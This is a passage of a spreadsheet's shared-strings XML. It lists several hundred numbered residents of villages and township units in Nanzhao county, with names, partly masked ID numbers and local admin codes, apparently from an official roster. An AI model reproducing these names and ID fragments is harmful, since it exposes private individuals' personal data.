    <t>余长青</t>
  </si>
  <si>
    <t>412921********0733</t>
  </si>
  <si>
    <t>1249</t>
  </si>
  <si>
    <t>余付云</t>
  </si>
  <si>
    <t>411321********2847</t>
  </si>
  <si>
    <t>1250</t>
  </si>
  <si>
    <t>郭伟</t>
  </si>
  <si>
    <t>412921********043X</t>
  </si>
  <si>
    <t>1251</t>
  </si>
  <si>
    <t>黄志平</t>
  </si>
  <si>
    <t>1252</t>
  </si>
  <si>
    <t>刘长聚</t>
  </si>
  <si>
    <t>412921********0734</t>
  </si>
  <si>
    <t>1253</t>
  </si>
  <si>
    <t>仝运焕</t>
  </si>
  <si>
    <t>412921********092X</t>
  </si>
  <si>
    <t>1254</t>
  </si>
  <si>
    <t>郭玉花</t>
  </si>
  <si>
    <t>412921********0727</t>
  </si>
  <si>
    <t>1255</t>
  </si>
  <si>
    <t>刘长德</t>
  </si>
  <si>
    <t>412921********0736</t>
  </si>
  <si>
    <t>1256</t>
  </si>
  <si>
    <t>唐合林</t>
  </si>
  <si>
    <t>412921********0730</t>
  </si>
  <si>
    <t>1257</t>
  </si>
  <si>
    <t>张德玲</t>
  </si>
  <si>
    <t>412921********2449</t>
  </si>
  <si>
    <t>1258</t>
  </si>
  <si>
    <t>杨德敏</t>
  </si>
  <si>
    <t>412921********0719</t>
  </si>
  <si>
    <t>1259</t>
  </si>
  <si>
    <t>许九梅</t>
  </si>
  <si>
    <t>412921********0720</t>
  </si>
  <si>
    <t>1260</t>
  </si>
  <si>
    <t>王永周</t>
  </si>
  <si>
    <t>412921********071X</t>
  </si>
  <si>
    <t>1261</t>
  </si>
  <si>
    <t>董兰</t>
  </si>
  <si>
    <t>412921********0785</t>
  </si>
  <si>
    <t>1262</t>
  </si>
  <si>
    <t>唐森林</t>
  </si>
  <si>
    <t>412921********0715</t>
  </si>
  <si>
    <t>1263</t>
  </si>
  <si>
    <t>冯付英</t>
  </si>
  <si>
    <t>412921********0745</t>
  </si>
  <si>
    <t>1264</t>
  </si>
  <si>
    <t>唐树林</t>
  </si>
  <si>
    <t>412921********0739</t>
  </si>
  <si>
    <t>1265</t>
  </si>
  <si>
    <t>孙士青</t>
  </si>
  <si>
    <t>412921********0764</t>
  </si>
  <si>
    <t>1266</t>
  </si>
  <si>
    <t>杨清然</t>
  </si>
  <si>
    <t>412921********0714</t>
  </si>
  <si>
    <t>1267</t>
  </si>
  <si>
    <t>杜长连</t>
  </si>
  <si>
    <t>1268</t>
  </si>
  <si>
    <t>孙五</t>
  </si>
  <si>
    <t>1269</t>
  </si>
  <si>
    <t>1270</t>
  </si>
  <si>
    <t>唐拴林</t>
  </si>
  <si>
    <t>412921********0716</t>
  </si>
  <si>
    <t>1271</t>
  </si>
  <si>
    <t>孟庆海</t>
  </si>
  <si>
    <t>412921********0738</t>
  </si>
  <si>
    <t>1272</t>
  </si>
  <si>
    <t>李桂琴</t>
  </si>
  <si>
    <t>1273</t>
  </si>
  <si>
    <t>刘亮中</t>
  </si>
  <si>
    <t>412921********0737</t>
  </si>
  <si>
    <t>1274</t>
  </si>
  <si>
    <t>张全华</t>
  </si>
  <si>
    <t>412921********0803</t>
  </si>
  <si>
    <t>1275</t>
  </si>
  <si>
    <t>王树欣</t>
  </si>
  <si>
    <t>412921********0748</t>
  </si>
  <si>
    <t>1276</t>
  </si>
  <si>
    <t>刘元中</t>
  </si>
  <si>
    <t>412921********0755</t>
  </si>
  <si>
    <t>1277</t>
  </si>
  <si>
    <t>刘青中</t>
  </si>
  <si>
    <t>1278</t>
  </si>
  <si>
    <t xml:space="preserve">郭金瑞 </t>
  </si>
  <si>
    <t>1279</t>
  </si>
  <si>
    <t>刘运中</t>
  </si>
  <si>
    <t>1280</t>
  </si>
  <si>
    <t>刘正中</t>
  </si>
  <si>
    <t>1281</t>
  </si>
  <si>
    <t>刘明中</t>
  </si>
  <si>
    <t>412921********0753</t>
  </si>
  <si>
    <t>1282</t>
  </si>
  <si>
    <t>唐畄拴</t>
  </si>
  <si>
    <t>412921********0732</t>
  </si>
  <si>
    <t>1283</t>
  </si>
  <si>
    <t>王坤</t>
  </si>
  <si>
    <t>412921********0717</t>
  </si>
  <si>
    <t>1284</t>
  </si>
  <si>
    <t>王运秀</t>
  </si>
  <si>
    <t>1285</t>
  </si>
  <si>
    <t>唐松林</t>
  </si>
  <si>
    <t>412921********0712</t>
  </si>
  <si>
    <t>1286</t>
  </si>
  <si>
    <t>张明云</t>
  </si>
  <si>
    <t>412921********0767</t>
  </si>
  <si>
    <t>1287</t>
  </si>
  <si>
    <t>唐军</t>
  </si>
  <si>
    <t>411326********0756</t>
  </si>
  <si>
    <t>1288</t>
  </si>
  <si>
    <t>刘明义</t>
  </si>
  <si>
    <t>1289</t>
  </si>
  <si>
    <t>刘国中</t>
  </si>
  <si>
    <t>1290</t>
  </si>
  <si>
    <t>姚荣桂</t>
  </si>
  <si>
    <t>412921********0760</t>
  </si>
  <si>
    <t>1291</t>
  </si>
  <si>
    <t>席广玲</t>
  </si>
  <si>
    <t>412921********0747</t>
  </si>
  <si>
    <t>1292</t>
  </si>
  <si>
    <t>刘炳香</t>
  </si>
  <si>
    <t>412921********1544</t>
  </si>
  <si>
    <t>1293</t>
  </si>
  <si>
    <t>杨定</t>
  </si>
  <si>
    <t>1294</t>
  </si>
  <si>
    <t>韩尽香</t>
  </si>
  <si>
    <t>412921********0740</t>
  </si>
  <si>
    <t>1295</t>
  </si>
  <si>
    <t>霍之焕</t>
  </si>
  <si>
    <t>412921********0761</t>
  </si>
  <si>
    <t>1296</t>
  </si>
  <si>
    <t>唐子峰</t>
  </si>
  <si>
    <t>411321********0730</t>
  </si>
  <si>
    <t>1297</t>
  </si>
  <si>
    <t>尚国兰</t>
  </si>
  <si>
    <t>412921********0742</t>
  </si>
  <si>
    <t>1298</t>
  </si>
  <si>
    <t>刘义伟</t>
  </si>
  <si>
    <t>1299</t>
  </si>
  <si>
    <t>张定华</t>
  </si>
  <si>
    <t>1300</t>
  </si>
  <si>
    <t>唐银芳</t>
  </si>
  <si>
    <t>1301</t>
  </si>
  <si>
    <t>刘畅</t>
  </si>
  <si>
    <t>412921********0799</t>
  </si>
  <si>
    <t>1302</t>
  </si>
  <si>
    <t>孙秋菊</t>
  </si>
  <si>
    <t>412929********2926</t>
  </si>
  <si>
    <t>1303</t>
  </si>
  <si>
    <t>刘彦君</t>
  </si>
  <si>
    <t>411326********0726</t>
  </si>
  <si>
    <t>1304</t>
  </si>
  <si>
    <t>刘景平</t>
  </si>
  <si>
    <t>412921********5528</t>
  </si>
  <si>
    <t>1305</t>
  </si>
  <si>
    <t>刘义芳</t>
  </si>
  <si>
    <t>412921********0749</t>
  </si>
  <si>
    <t>1306</t>
  </si>
  <si>
    <t>王永超</t>
  </si>
  <si>
    <t>1307</t>
  </si>
  <si>
    <t>柴荣华</t>
  </si>
  <si>
    <t>412921********0788</t>
  </si>
  <si>
    <t>1308</t>
  </si>
  <si>
    <t>刘小玉</t>
  </si>
  <si>
    <t>411326********0728</t>
  </si>
  <si>
    <t>1309</t>
  </si>
  <si>
    <t>唐金芳</t>
  </si>
  <si>
    <t>1310</t>
  </si>
  <si>
    <t>王天玲</t>
  </si>
  <si>
    <t>411326********0725</t>
  </si>
  <si>
    <t>1311</t>
  </si>
  <si>
    <t>李泉江</t>
  </si>
  <si>
    <t>411321********0732</t>
  </si>
  <si>
    <t>1312</t>
  </si>
  <si>
    <t>刘迪</t>
  </si>
  <si>
    <t>411326********0745</t>
  </si>
  <si>
    <t>1313</t>
  </si>
  <si>
    <t>袁玉珍</t>
  </si>
  <si>
    <t>1314</t>
  </si>
  <si>
    <t>刘长山</t>
  </si>
  <si>
    <t>1315</t>
  </si>
  <si>
    <t>吴秀林</t>
  </si>
  <si>
    <t>412921********072X</t>
  </si>
  <si>
    <t>1316</t>
  </si>
  <si>
    <t>唐金焕</t>
  </si>
  <si>
    <t>1317</t>
  </si>
  <si>
    <t>王德先</t>
  </si>
  <si>
    <t>1318</t>
  </si>
  <si>
    <t>李天应</t>
  </si>
  <si>
    <t>411326********0770</t>
  </si>
  <si>
    <t>1319</t>
  </si>
  <si>
    <t>孟阳</t>
  </si>
  <si>
    <t>411326********071X</t>
  </si>
  <si>
    <t>1320</t>
  </si>
  <si>
    <t>陈庆</t>
  </si>
  <si>
    <t>4113210313</t>
  </si>
  <si>
    <t>1321</t>
  </si>
  <si>
    <t>刘义荣</t>
  </si>
  <si>
    <t>1322</t>
  </si>
  <si>
    <t>任昱函</t>
  </si>
  <si>
    <t>411326********0723</t>
  </si>
  <si>
    <t>1323</t>
  </si>
  <si>
    <t>校委会</t>
  </si>
  <si>
    <t>庆建成</t>
  </si>
  <si>
    <t>412921********0792</t>
  </si>
  <si>
    <t>1324</t>
  </si>
  <si>
    <t>尹轲轲</t>
  </si>
  <si>
    <t>411326********0753</t>
  </si>
  <si>
    <t>1325</t>
  </si>
  <si>
    <t>张高远</t>
  </si>
  <si>
    <t>411321********5538</t>
  </si>
  <si>
    <t>1326</t>
  </si>
  <si>
    <t>张玉兰</t>
  </si>
  <si>
    <t>1327</t>
  </si>
  <si>
    <t>供销社</t>
  </si>
  <si>
    <t>马仪昌</t>
  </si>
  <si>
    <t>412921********0752</t>
  </si>
  <si>
    <t>1328</t>
  </si>
  <si>
    <t>王长松</t>
  </si>
  <si>
    <t>1329</t>
  </si>
  <si>
    <t>米红霞</t>
  </si>
  <si>
    <t>412921********0800</t>
  </si>
  <si>
    <t>1330</t>
  </si>
  <si>
    <t>粮管所</t>
  </si>
  <si>
    <t>张新荣</t>
  </si>
  <si>
    <t>412921********0710</t>
  </si>
  <si>
    <t>1331</t>
  </si>
  <si>
    <t>聂玖桂</t>
  </si>
  <si>
    <t>1332</t>
  </si>
  <si>
    <t>尹延山</t>
  </si>
  <si>
    <t>1333</t>
  </si>
  <si>
    <t>建设居委会</t>
  </si>
  <si>
    <t>唐琬茹</t>
  </si>
  <si>
    <t>1334</t>
  </si>
  <si>
    <t>李培</t>
  </si>
  <si>
    <t>411326********1146</t>
  </si>
  <si>
    <t>1335</t>
  </si>
  <si>
    <t>唐英超</t>
  </si>
  <si>
    <t>411326********0713</t>
  </si>
  <si>
    <t>1336</t>
  </si>
  <si>
    <t>油坊村</t>
  </si>
  <si>
    <t>张宏</t>
  </si>
  <si>
    <t>1337</t>
  </si>
  <si>
    <t>靳晓亮</t>
  </si>
  <si>
    <t>1338</t>
  </si>
  <si>
    <t>卞金成</t>
  </si>
  <si>
    <t>1339</t>
  </si>
  <si>
    <t>刘娟</t>
  </si>
  <si>
    <t>411326********0722</t>
  </si>
  <si>
    <t>1340</t>
  </si>
  <si>
    <t>官坡村</t>
  </si>
  <si>
    <t>刘万会</t>
  </si>
  <si>
    <t>412921********242X</t>
  </si>
  <si>
    <t>1341</t>
  </si>
  <si>
    <t>食品站</t>
  </si>
  <si>
    <t>汤传东</t>
  </si>
  <si>
    <t>1342</t>
  </si>
  <si>
    <t>刘义朝</t>
  </si>
  <si>
    <t>412921********0793</t>
  </si>
  <si>
    <t>411321101209</t>
  </si>
  <si>
    <t>1343</t>
  </si>
  <si>
    <t>杨扒村</t>
  </si>
  <si>
    <t>任维秀</t>
  </si>
  <si>
    <t>1344</t>
  </si>
  <si>
    <t>宋刚</t>
  </si>
  <si>
    <t>1345</t>
  </si>
  <si>
    <t>小店乡</t>
  </si>
  <si>
    <t>秦生松</t>
  </si>
  <si>
    <t>412921********1130</t>
  </si>
  <si>
    <t>4113210499</t>
  </si>
  <si>
    <t>1346</t>
  </si>
  <si>
    <t>刘元霞</t>
  </si>
  <si>
    <t>412921********1129</t>
  </si>
  <si>
    <t>1347</t>
  </si>
  <si>
    <t>汤甲梅</t>
  </si>
  <si>
    <t>1348</t>
  </si>
  <si>
    <t>陈玲</t>
  </si>
  <si>
    <t>412921********1125</t>
  </si>
  <si>
    <t>1349</t>
  </si>
  <si>
    <t>412921********1567</t>
  </si>
  <si>
    <t>4113210413</t>
  </si>
  <si>
    <t>1350</t>
  </si>
  <si>
    <t>朱三合</t>
  </si>
  <si>
    <t>412921********1134</t>
  </si>
  <si>
    <t>4113210410</t>
  </si>
  <si>
    <t>1351</t>
  </si>
  <si>
    <t>李村村</t>
  </si>
  <si>
    <t>刘付环</t>
  </si>
  <si>
    <t>412921********1123</t>
  </si>
  <si>
    <t>1352</t>
  </si>
  <si>
    <t>乔玉宏</t>
  </si>
  <si>
    <t>1353</t>
  </si>
  <si>
    <t>杨玉辽</t>
  </si>
  <si>
    <t>412921********117X</t>
  </si>
  <si>
    <t>1354</t>
  </si>
  <si>
    <t>赵国营</t>
  </si>
  <si>
    <t>412921********2417</t>
  </si>
  <si>
    <t>1355</t>
  </si>
  <si>
    <t>姜召平</t>
  </si>
  <si>
    <t>412921********1553</t>
  </si>
  <si>
    <t>1356</t>
  </si>
  <si>
    <t>吴春晓</t>
  </si>
  <si>
    <t>411326********1966</t>
  </si>
  <si>
    <t>1357</t>
  </si>
  <si>
    <t>刘耀谦</t>
  </si>
  <si>
    <t>411321********1115</t>
  </si>
  <si>
    <t>1358</t>
  </si>
  <si>
    <t>412921********115X</t>
  </si>
  <si>
    <t>1359</t>
  </si>
  <si>
    <t>李旭</t>
  </si>
  <si>
    <t>412921********1132</t>
  </si>
  <si>
    <t>1360</t>
  </si>
  <si>
    <t>刘宏周</t>
  </si>
  <si>
    <t>412921********1137</t>
  </si>
  <si>
    <t>1361</t>
  </si>
  <si>
    <t>王谦益</t>
  </si>
  <si>
    <t>412921********1218</t>
  </si>
  <si>
    <t>1362</t>
  </si>
  <si>
    <t>李召龙</t>
  </si>
  <si>
    <t>412921********1114</t>
  </si>
  <si>
    <t>4113210415</t>
  </si>
  <si>
    <t>1363</t>
  </si>
  <si>
    <t>孟相合</t>
  </si>
  <si>
    <t>412921********1177</t>
  </si>
  <si>
    <t>1364</t>
  </si>
  <si>
    <t>王清轩</t>
  </si>
  <si>
    <t>412921********1133</t>
  </si>
  <si>
    <t>4113210412</t>
  </si>
  <si>
    <t>1365</t>
  </si>
  <si>
    <t>曾钇铭</t>
  </si>
  <si>
    <t>411321********5652</t>
  </si>
  <si>
    <t>1366</t>
  </si>
  <si>
    <t>云阳镇</t>
  </si>
  <si>
    <t>小关九组</t>
  </si>
  <si>
    <t>吴芳</t>
  </si>
  <si>
    <t>412921********1588</t>
  </si>
  <si>
    <t>4113210521</t>
  </si>
  <si>
    <t>1367</t>
  </si>
  <si>
    <t>王毅</t>
  </si>
  <si>
    <t>411321********6113</t>
  </si>
  <si>
    <t>1368</t>
  </si>
  <si>
    <t>王旋</t>
  </si>
  <si>
    <t>411321********6203</t>
  </si>
  <si>
    <t>1369</t>
  </si>
  <si>
    <t>小关四组</t>
  </si>
  <si>
    <t>赵青坡</t>
  </si>
  <si>
    <t>412921********1513</t>
  </si>
  <si>
    <t>1370</t>
  </si>
  <si>
    <t>郭金平</t>
  </si>
  <si>
    <t>1371</t>
  </si>
  <si>
    <t>杨蕊</t>
  </si>
  <si>
    <t>411326********1584</t>
  </si>
  <si>
    <t>1372</t>
  </si>
  <si>
    <t>大关一组</t>
  </si>
  <si>
    <t>张新生</t>
  </si>
  <si>
    <t>412921********1531</t>
  </si>
  <si>
    <t>4113210522</t>
  </si>
  <si>
    <t>1373</t>
  </si>
  <si>
    <t>小关六组</t>
  </si>
  <si>
    <t>刘建方</t>
  </si>
  <si>
    <t>411326********1567</t>
  </si>
  <si>
    <t>1374</t>
  </si>
  <si>
    <t>老城四组</t>
  </si>
  <si>
    <t>李月森</t>
  </si>
  <si>
    <t>412921********1618</t>
  </si>
  <si>
    <t>4113210523</t>
  </si>
  <si>
    <t>1375</t>
  </si>
  <si>
    <t>南召店袁庄</t>
  </si>
  <si>
    <t>杨传瑞</t>
  </si>
  <si>
    <t>412921********1522</t>
  </si>
  <si>
    <t>4113210519</t>
  </si>
  <si>
    <t>1376</t>
  </si>
  <si>
    <t>宋金兰</t>
  </si>
  <si>
    <t>412921********1523</t>
  </si>
  <si>
    <t>1377</t>
  </si>
  <si>
    <t>刘书林</t>
  </si>
  <si>
    <t>412921********1515</t>
  </si>
  <si>
    <t>1378</t>
  </si>
  <si>
    <t>王聚玲</t>
  </si>
  <si>
    <t>412921********1527</t>
  </si>
  <si>
    <t>1379</t>
  </si>
  <si>
    <t>老城一组</t>
  </si>
  <si>
    <t>郑桂花</t>
  </si>
  <si>
    <t>1380</t>
  </si>
  <si>
    <t>老城十组</t>
  </si>
  <si>
    <t>姚金先</t>
  </si>
  <si>
    <t>412921********1520</t>
  </si>
  <si>
    <t>1381</t>
  </si>
  <si>
    <t>小关二组</t>
  </si>
  <si>
    <t>牧国有</t>
  </si>
  <si>
    <t>412921********1519</t>
  </si>
  <si>
    <t>1382</t>
  </si>
  <si>
    <t>牧国东</t>
  </si>
  <si>
    <t>412921********1538</t>
  </si>
  <si>
    <t>1383</t>
  </si>
  <si>
    <t>张玉爱</t>
  </si>
  <si>
    <t>412921********1543</t>
  </si>
  <si>
    <t>1384</t>
  </si>
  <si>
    <t>杨留德</t>
  </si>
  <si>
    <t>412921********1539</t>
  </si>
  <si>
    <t>1385</t>
  </si>
  <si>
    <t>刘淑贞</t>
  </si>
  <si>
    <t>1386</t>
  </si>
  <si>
    <t>大关二组</t>
  </si>
  <si>
    <t>李保青</t>
  </si>
  <si>
    <t>412921********1571</t>
  </si>
  <si>
    <t>1387</t>
  </si>
  <si>
    <t>大关十组</t>
  </si>
  <si>
    <t>李天芝</t>
  </si>
  <si>
    <t>412921********160X</t>
  </si>
  <si>
    <t>1388</t>
  </si>
  <si>
    <t>武自杰</t>
  </si>
  <si>
    <t>412921********1540</t>
  </si>
  <si>
    <t>1389</t>
  </si>
  <si>
    <t>刘宝华</t>
  </si>
  <si>
    <t>411326********1511</t>
  </si>
  <si>
    <t>1390</t>
  </si>
  <si>
    <t>刘秀兰</t>
  </si>
  <si>
    <t>412921********1585</t>
  </si>
  <si>
    <t>1391</t>
  </si>
  <si>
    <t>李金凤</t>
  </si>
  <si>
    <t>1392</t>
  </si>
  <si>
    <t>雷民</t>
  </si>
  <si>
    <t>412921********1512</t>
  </si>
  <si>
    <t>1393</t>
  </si>
  <si>
    <t>熊军先</t>
  </si>
  <si>
    <t>412921********1645</t>
  </si>
  <si>
    <t>1394</t>
  </si>
  <si>
    <t>张天华</t>
  </si>
  <si>
    <t>412921********1525</t>
  </si>
  <si>
    <t>1395</t>
  </si>
  <si>
    <t>林清献</t>
  </si>
  <si>
    <t>412921********1517</t>
  </si>
  <si>
    <t>1396</t>
  </si>
  <si>
    <t>南召店南头</t>
  </si>
  <si>
    <t>段大运</t>
  </si>
  <si>
    <t>412921********1511</t>
  </si>
  <si>
    <t>1397</t>
  </si>
  <si>
    <t>黄荣兰</t>
  </si>
  <si>
    <t>412921********1548</t>
  </si>
  <si>
    <t>1398</t>
  </si>
  <si>
    <t>杨永忠</t>
  </si>
  <si>
    <t>412921********157X</t>
  </si>
  <si>
    <t>1399</t>
  </si>
  <si>
    <t>赵振堂</t>
  </si>
  <si>
    <t>1400</t>
  </si>
  <si>
    <t>赵丙君</t>
  </si>
  <si>
    <t>1401</t>
  </si>
  <si>
    <t>光荣院</t>
  </si>
  <si>
    <t>贾哲先</t>
  </si>
  <si>
    <t>412921********1597</t>
  </si>
  <si>
    <t>4113210599</t>
  </si>
  <si>
    <t>1402</t>
  </si>
  <si>
    <t>老城（南召二高）</t>
  </si>
  <si>
    <t>乔宏欣</t>
  </si>
  <si>
    <t>1403</t>
  </si>
  <si>
    <t>郑慎典</t>
  </si>
  <si>
    <t>412921********1516</t>
  </si>
  <si>
    <t>1404</t>
  </si>
  <si>
    <t>杨永安</t>
  </si>
  <si>
    <t>1405</t>
  </si>
  <si>
    <t>刘秀梅</t>
  </si>
  <si>
    <t>1406</t>
  </si>
  <si>
    <t>镇直（校委会）</t>
  </si>
  <si>
    <t>杨昆峰</t>
  </si>
  <si>
    <t>412921********1551</t>
  </si>
  <si>
    <t>1407</t>
  </si>
  <si>
    <t>张国凡</t>
  </si>
  <si>
    <t>412921********1526</t>
  </si>
  <si>
    <t>1408</t>
  </si>
  <si>
    <t>镇直（政府）</t>
  </si>
  <si>
    <t>李耀民</t>
  </si>
  <si>
    <t>1409</t>
  </si>
  <si>
    <t>杜三跃</t>
  </si>
  <si>
    <t>1410</t>
  </si>
  <si>
    <t>张道才</t>
  </si>
  <si>
    <t>412921********1611</t>
  </si>
  <si>
    <t>1411</t>
  </si>
  <si>
    <t>镇直（麻绢厂）</t>
  </si>
  <si>
    <t>王雪峰</t>
  </si>
  <si>
    <t>1412</t>
  </si>
  <si>
    <t>黄金梅</t>
  </si>
  <si>
    <t>1413</t>
  </si>
  <si>
    <t>刘金果</t>
  </si>
  <si>
    <t>411326********1546</t>
  </si>
  <si>
    <t>1414</t>
  </si>
  <si>
    <t>杨留章</t>
  </si>
  <si>
    <t>412921********1578</t>
  </si>
  <si>
    <t>1415</t>
  </si>
  <si>
    <t>王新如</t>
  </si>
  <si>
    <t>1416</t>
  </si>
  <si>
    <t>李月兴</t>
  </si>
  <si>
    <t>412921********1537</t>
  </si>
  <si>
    <t>1417</t>
  </si>
  <si>
    <t>李永玲</t>
  </si>
  <si>
    <t>1418</t>
  </si>
  <si>
    <t>李书霞</t>
  </si>
  <si>
    <t>1419</t>
  </si>
  <si>
    <t>余增慧</t>
  </si>
  <si>
    <t>1420</t>
  </si>
  <si>
    <t>赵超岳</t>
  </si>
  <si>
    <t>412921********1535</t>
  </si>
  <si>
    <t>1421</t>
  </si>
  <si>
    <t>欧阳福敏</t>
  </si>
  <si>
    <t>412921********1547</t>
  </si>
  <si>
    <t>1422</t>
  </si>
  <si>
    <t>段长林</t>
  </si>
  <si>
    <t>1423</t>
  </si>
  <si>
    <t>李付强</t>
  </si>
  <si>
    <t>1424</t>
  </si>
  <si>
    <t>雷闯</t>
  </si>
  <si>
    <t>411326********6176</t>
  </si>
  <si>
    <t>1425</t>
  </si>
  <si>
    <t>郭长惠</t>
  </si>
  <si>
    <t>1426</t>
  </si>
  <si>
    <t>王长敏</t>
  </si>
  <si>
    <t>412921********1628</t>
  </si>
  <si>
    <t>1427</t>
  </si>
  <si>
    <t>崔尚杰</t>
  </si>
  <si>
    <t>1428</t>
  </si>
  <si>
    <t>老城二组</t>
  </si>
  <si>
    <t>车怀亮</t>
  </si>
  <si>
    <t>1429</t>
  </si>
  <si>
    <t>王聚合</t>
  </si>
  <si>
    <t>1430</t>
  </si>
  <si>
    <t>郭红宝</t>
  </si>
  <si>
    <t>412921********1545</t>
  </si>
  <si>
    <t>1431</t>
  </si>
  <si>
    <t>胡丰</t>
  </si>
  <si>
    <t>412921********1568</t>
  </si>
  <si>
    <t>1432</t>
  </si>
  <si>
    <t>武自梅</t>
  </si>
  <si>
    <t>412921********154X</t>
  </si>
  <si>
    <t>1433</t>
  </si>
  <si>
    <t>赵丙钦</t>
  </si>
  <si>
    <t>1434</t>
  </si>
  <si>
    <t>曹北岳</t>
  </si>
  <si>
    <t>412921********1582</t>
  </si>
  <si>
    <t>1435</t>
  </si>
  <si>
    <t>袁保德</t>
  </si>
  <si>
    <t>1436</t>
  </si>
  <si>
    <t>袁清付</t>
  </si>
  <si>
    <t>412921********1570</t>
  </si>
  <si>
    <t>1437</t>
  </si>
  <si>
    <t>刘玉琴</t>
  </si>
  <si>
    <t>1438</t>
  </si>
  <si>
    <t>杨春生</t>
  </si>
  <si>
    <t>1439</t>
  </si>
  <si>
    <t>李欣</t>
  </si>
  <si>
    <t>1440</t>
  </si>
  <si>
    <t>蔡秀云</t>
  </si>
  <si>
    <t>412921********1528</t>
  </si>
  <si>
    <t>1441</t>
  </si>
  <si>
    <t>袁保怀</t>
  </si>
  <si>
    <t>1442</t>
  </si>
  <si>
    <t>张国云</t>
  </si>
  <si>
    <t>1443</t>
  </si>
  <si>
    <t>臧萍</t>
  </si>
  <si>
    <t>1444</t>
  </si>
  <si>
    <t>王玉霞</t>
  </si>
  <si>
    <t>412921********1561</t>
  </si>
  <si>
    <t>1445</t>
  </si>
  <si>
    <t>袁二东</t>
  </si>
  <si>
    <t>1446</t>
  </si>
  <si>
    <t>杨玉敏</t>
  </si>
  <si>
    <t>1447</t>
  </si>
  <si>
    <t>霍万记</t>
  </si>
  <si>
    <t>412921********1555</t>
  </si>
  <si>
    <t>1448</t>
  </si>
  <si>
    <t>赵小玲</t>
  </si>
  <si>
    <t>412921********1581</t>
  </si>
  <si>
    <t>1449</t>
  </si>
  <si>
    <t>袁书印</t>
  </si>
  <si>
    <t>1450</t>
  </si>
  <si>
    <t>小关三组</t>
  </si>
  <si>
    <t>马学良</t>
  </si>
  <si>
    <t>412921********1532</t>
  </si>
  <si>
    <t>1451</t>
  </si>
  <si>
    <t>芦秀英</t>
  </si>
  <si>
    <t>412921********1524</t>
  </si>
  <si>
    <t>1452</t>
  </si>
  <si>
    <t>张士焕</t>
  </si>
  <si>
    <t>1453</t>
  </si>
  <si>
    <t>杨永栓</t>
  </si>
  <si>
    <t>1454</t>
  </si>
  <si>
    <t>刘玉珍</t>
  </si>
  <si>
    <t>412921********1521</t>
  </si>
  <si>
    <t>1455</t>
  </si>
  <si>
    <t>廉德华</t>
  </si>
  <si>
    <t>1456</t>
  </si>
  <si>
    <t>高书存</t>
  </si>
  <si>
    <t>1457</t>
  </si>
  <si>
    <t>郭广华</t>
  </si>
  <si>
    <t>1458</t>
  </si>
  <si>
    <t>刘玉芝</t>
  </si>
  <si>
    <t>1459</t>
  </si>
  <si>
    <t>刘书玲</t>
  </si>
  <si>
    <t>1460</t>
  </si>
  <si>
    <t>任拢</t>
  </si>
  <si>
    <t>412921********1589</t>
  </si>
  <si>
    <t>1461</t>
  </si>
  <si>
    <t>小关五组</t>
  </si>
  <si>
    <t>李金永</t>
  </si>
  <si>
    <t>1462</t>
  </si>
  <si>
    <t>赵中纪</t>
  </si>
  <si>
    <t>412921********1533</t>
  </si>
  <si>
    <t>1463</t>
  </si>
  <si>
    <t>刘新敏</t>
  </si>
  <si>
    <t>412921********1885</t>
  </si>
  <si>
    <t>1464</t>
  </si>
  <si>
    <t>杨春花</t>
  </si>
  <si>
    <t>1465</t>
  </si>
  <si>
    <t>尚春华</t>
  </si>
  <si>
    <t>1466</t>
  </si>
  <si>
    <t>王明军</t>
  </si>
  <si>
    <t>412921********1518</t>
  </si>
  <si>
    <t>1467</t>
  </si>
  <si>
    <t>云阳镇南召店</t>
  </si>
  <si>
    <t>朱合香</t>
  </si>
  <si>
    <t>412921********152X</t>
  </si>
  <si>
    <t>1468</t>
  </si>
  <si>
    <t>高相兰</t>
  </si>
  <si>
    <t>1469</t>
  </si>
  <si>
    <t>赵中民</t>
  </si>
  <si>
    <t>1470</t>
  </si>
  <si>
    <t>朱应明</t>
  </si>
  <si>
    <t>1471</t>
  </si>
  <si>
    <t>顾秀真</t>
  </si>
  <si>
    <t>1472</t>
  </si>
  <si>
    <t>孙书芝</t>
  </si>
  <si>
    <t>1473</t>
  </si>
  <si>
    <t>余永聚</t>
  </si>
  <si>
    <t>412921********1554</t>
  </si>
  <si>
    <t>1474</t>
  </si>
  <si>
    <t>马德乾</t>
  </si>
  <si>
    <t>412921********156X</t>
  </si>
  <si>
    <t>1475</t>
  </si>
  <si>
    <t>赵子梅</t>
  </si>
  <si>
    <t>412921********1541</t>
  </si>
  <si>
    <t>1476</t>
  </si>
  <si>
    <t>秦生霞</t>
  </si>
  <si>
    <t>1477</t>
  </si>
  <si>
    <t>王家齐</t>
  </si>
  <si>
    <t>1478</t>
  </si>
  <si>
    <t>徐成</t>
  </si>
  <si>
    <t>412921********163X</t>
  </si>
  <si>
    <t>1479</t>
  </si>
  <si>
    <t>张方</t>
  </si>
  <si>
    <t>1480</t>
  </si>
  <si>
    <t>镇直（敬老院）</t>
  </si>
  <si>
    <t>杨超</t>
  </si>
  <si>
    <t>411326********1510</t>
  </si>
  <si>
    <t>1481</t>
  </si>
  <si>
    <t>张道玉</t>
  </si>
  <si>
    <t>412921********158X</t>
  </si>
  <si>
    <t>1482</t>
  </si>
  <si>
    <t>廉正梅</t>
  </si>
  <si>
    <t>1483</t>
  </si>
  <si>
    <t>李德伟</t>
  </si>
  <si>
    <t>1484</t>
  </si>
  <si>
    <t>杨德福</t>
  </si>
  <si>
    <t>1485</t>
  </si>
  <si>
    <t>李秀勤</t>
  </si>
  <si>
    <t>1486</t>
  </si>
  <si>
    <t>王书明</t>
  </si>
  <si>
    <t>412921********1558</t>
  </si>
  <si>
    <t>1487</t>
  </si>
  <si>
    <t>镇直（初中家属院）</t>
  </si>
  <si>
    <t>岳崇</t>
  </si>
  <si>
    <t>411326********1527</t>
  </si>
  <si>
    <t>1488</t>
  </si>
  <si>
    <t>王圆庚</t>
  </si>
  <si>
    <t>411321********1513</t>
  </si>
  <si>
    <t>1489</t>
  </si>
  <si>
    <t>袁福有</t>
  </si>
  <si>
    <t>1490</t>
  </si>
  <si>
    <t>张贵娇</t>
  </si>
  <si>
    <t>1491</t>
  </si>
  <si>
    <t>李玉玲</t>
  </si>
  <si>
    <t>412921********1564</t>
  </si>
  <si>
    <t>1492</t>
  </si>
  <si>
    <t>郑国勋</t>
  </si>
  <si>
    <t>1493</t>
  </si>
  <si>
    <t>张树玉</t>
  </si>
  <si>
    <t>412921********1536</t>
  </si>
  <si>
    <t>1494</t>
  </si>
  <si>
    <t>杨秀霞</t>
  </si>
  <si>
    <t>1495</t>
  </si>
  <si>
    <t>李士贵</t>
  </si>
  <si>
    <t>1496</t>
  </si>
  <si>
    <t>张延超</t>
  </si>
  <si>
    <t>1497</t>
  </si>
  <si>
    <t>1498</t>
  </si>
